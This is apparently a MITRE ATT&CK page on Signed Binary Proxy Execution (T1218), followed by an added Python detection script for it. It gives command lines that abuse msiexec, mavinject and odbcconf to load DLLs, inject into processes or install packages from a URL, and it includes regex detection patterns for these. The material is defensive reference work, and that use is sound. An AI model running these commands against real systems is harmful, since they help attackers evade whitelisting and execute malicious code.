Signed Binary Proxy Execution

Binaries signed with trusted digital certificates are allowed to execute on Windows systems that enforce digital signature validation. Several Microsoft-signed binaries that are present by default on Windows installations can be used to proxy the execution of other files. Adversaries may abuse this behavior to execute malicious files in a way that bypasses application whitelisting and signature validation. This technique covers proxy-execution methods that are not already accounted for by existing techniques.

Msiexec.exe

Msiexec.exe is the command-line utility for the Windows Installer service. Adversaries may use msiexec.exe to launch malicious MSI packages for code execution, either from the local file system or from a network location such as a URL or UNC path.[1][2][3] Msiexec.exe may also be used to load DLLs: the /y switch calls the DllRegisterServer export of the given DLL, in the same way Regsvr32 does.[1]

  • msiexec.exe /q /i "C:\path\to\file.msi"
  • msiexec.exe /q /i http[:]//site[.]com/file.msi
  • msiexec.exe /y "C:\path\to\file.dll"

Mavinject.exe

Mavinject.exe (the Microsoft Application Virtualization injector) is a Windows utility that allows for code execution. Given a process ID and the /INJECTRUNNING switch, Mavinject injects the specified DLL into that running process. [4]

  • "C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" <PID> /INJECTRUNNING <PATH DLL>
  • C:\Windows\system32\mavinject.exe <PID> /INJECTRUNNING <PATH DLL>

SyncAppvPublishingServer.exe

SyncAppvPublishingServer.exe, an Application Virtualization (App-V) client component, can be used to run PowerShell script content without spawning powershell.exe, so detections that key on the powershell.exe process image do not see it. [5]

Odbcconf.exe

Odbcconf.exe is a Windows utility for configuring Open Database Connectivity (ODBC) drivers and data source names.[6] Its REGSVR action loads the specified DLL and calls its DllRegisterServer export, which is functionally equivalent to Regsvr32 and can be misused to execute an arbitrary DLL.[7][8][9]

  • odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}

Several other signed binaries exist that may be used to perform similar behavior. [10]

ID: T1218
Tactic: Defense Evasion, Execution
Platform: Windows
Permissions Required: User
Data Sources: Process monitoring, Process command-line parameters
Defense Bypassed: Application whitelisting, Digital Certificate Validation
Contributors: Nishan Maharjan, @loki248; Hans Christoffer Gaardløs; Praetorian
Version: 2.0

Procedure Examples

Name Description
Cobalt Group

Cobalt Group has used odbcconf to proxy the execution of malicious DLL files.[9]

Duqu

Duqu has used msiexec to execute malicious Windows Installer packages. Additionally, a PROPERTY=VALUE pair passed on the msiexec command line supplied a 56-bit encryption key used to decrypt the main payload embedded in the installer packages.[11]

Rancor

Rancor has used msiexec to download and execute malicious installer files over HTTP.[2]

TA505

TA505 has used msiexec to download and execute malicious Windows Installer files.[12][13]

Mitigations

Mitigation Description
Execution Prevention

Certain signed binaries that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting (for example AppLocker) configured to block execution of these binaries where they are not required for a given system or network, to prevent potential misuse by adversaries.

Privileged Account Management

If these binaries are required, restrict their execution to the privileged accounts or groups that need them, to reduce the opportunities for malicious use.

Detection

Monitor process creation events and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Legitimate programs used in suspicious ways, such as msiexec.exe installing an MSI package from a URL, odbcconf.exe invoked with the REGSVR action, or mavinject.exe injecting into a running process, may indicate an intrusion. Correlate this activity with other suspicious behavior to reduce false positives from normal benign use by users and administrators; msiexec.exe in particular runs routinely during legitimate software installation.
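The command-line checks described above, as an added example that is not part of the original ATT&CK page: Python heuristics run over process-creation events (image path plus full command line) for the four binaries in this technique. The sample events, file paths, PID and the 198.51.100.7 address are constructed for the example, and the SyncAppvPublishingServer rule is a heuristic assumption of mine, keyed on statement separators in the argument, not a pattern the page states.

```python
"""
Added detection example (not part of the original ATT&CK page): simple
command-line heuristics for the T1218 proxy-execution binaries described
above, run over a handful of constructed process-creation events.

Each event carries the two fields the page names as data sources: the image
path (Sysmon Event ID 1 "Image" / Security 4688 "New Process Name") and the
full command line.  All sample events, paths, the PID and the 198.51.100.7
address are constructed for this example, not captured from a real host.
"""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    rule: str
    image: str
    command_line: str


# (rule name, regex on the image basename, regex on the command line); both
# are matched case-insensitively.  Patterns are deliberately narrow so that
# the most common benign use (msiexec installing a local package) does not alert.
RULES = [
    # msiexec fetching the package from a URL or UNC path (as documented above)
    ("msiexec_remote_install", r"^msiexec\.exe$",
     r"(?:^|\s)/(?:i|package)\s+\"?(?:https?://|\\\\)"),
    # msiexec /y (DllRegisterServer) or /z (DllUnregisterServer) loads a DLL
    ("msiexec_dll_register", r"^msiexec\.exe$", r"(?:^|\s)/[yz]\s"),
    # mavinject injecting a DLL into a running PID
    ("mavinject_injectrunning", r"^mavinject(?:32|64)?\.exe$", r"/injectrunning\b"),
    # odbcconf REGSVR action: Regsvr32-equivalent DLL load
    ("odbcconf_regsvr", r"^odbcconf\.exe$", r"\bregsvr\s"),
    # Heuristic (my assumption, not from the page): statement separators in the
    # argument suggest inline PowerShell rather than a plain server name.
    ("syncappvpublishingserver_inline_script",
     r"^syncappvpublishingserver\.exe$", r"[;|]"),
]


def detect(events):
    """Return a Finding for every (event, rule) pair that matches."""
    findings = []
    for ev in events:
        image = ev.get("Image", "")
        cmdline = ev.get("CommandLine", "")
        basename = image.rsplit("\\", 1)[-1]
        for name, image_re, cmd_re in RULES:
            if re.search(image_re, basename, re.I) and re.search(cmd_re, cmdline, re.I):
                findings.append(Finding(name, image, cmdline))
    return findings


SYS32 = r"C:\Windows\System32"
# Constructed sample events: five invocations mirroring the command lines quoted
# on this page, plus two benign ones (local MSI install, DSN configuration) that
# must not alert.
SAMPLE_EVENTS = [
    {"Image": SYS32 + r"\msiexec.exe",
     "CommandLine": r'msiexec.exe /q /i "C:\Users\alice\AppData\Local\Temp\setup.msi"'},  # benign
    {"Image": SYS32 + r"\msiexec.exe",
     "CommandLine": r"msiexec.exe /q /i http://198.51.100.7/file.msi"},
    {"Image": SYS32 + r"\msiexec.exe",
     "CommandLine": r'msiexec.exe /y "C:\Users\Public\file.dll"'},
    {"Image": SYS32 + r"\mavinject.exe",
     "CommandLine": r"mavinject.exe 4712 /INJECTRUNNING C:\Users\Public\file.dll"},
    {"Image": SYS32 + r"\odbcconf.exe",
     "CommandLine": r'odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}'},
    {"Image": SYS32 + r"\odbcconf.exe",
     "CommandLine": r'odbcconf.exe /A {CONFIGSYSDSN "SQL Server" "DSN=Reporting"}'},  # benign
    {"Image": SYS32 + r"\SyncAppvPublishingServer.exe",
     "CommandLine": r'SyncAppvPublishingServer.exe "n;Write-Output test"'},
]


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.image}\n    {f.command_line}")
```

Command-line coverage depends on the telemetry: Sysmon Event ID 1 records the full command line by default, whereas Security event 4688 only carries it when the "Include command line in process creation events" audit policy is enabled. Local msiexec installs are deliberately left unflagged to keep the rules tractable across a fleet; correlate hits with the parent process and outbound network activity, as the text above recommends.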

References